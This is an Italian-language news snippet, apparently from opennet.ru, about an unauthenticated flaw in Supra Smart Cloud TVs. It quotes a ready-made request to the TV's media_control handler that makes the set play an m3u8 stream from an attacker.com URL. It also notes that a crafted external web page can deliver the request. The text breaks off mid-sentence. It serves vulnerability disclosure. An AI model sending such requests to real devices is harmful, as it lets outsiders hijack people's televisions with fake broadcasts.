Sui televisori Supra Smart Cloud
Per un attacco è sufficiente inviare una richiesta di rete appositamente predisposta che non richiede autenticazione. In particolare, puoi accedere all'handler “/remote/media_control?action=setUri&uri=” specificando l'URL del file m3u8 con parametri video, ad esempio “http://192.168.1.155/remote/media_control?action=setUri&uri= http://attacker.com/fake_broadcast_message.m3u8."
Nella maggior parte dei casi, l'accesso all'indirizzo IP del televisore è limitato alla rete interna, ma poiché la richiesta viene inviata tramite HTTP, è possibile utilizzare metodi per accedere alle risorse interne quando l'utente apre una pagina esterna appositamente progettata (ad esempio, sotto sotto forma di una richiesta di immagine o utilizzando il file
Fonte: opennet.ru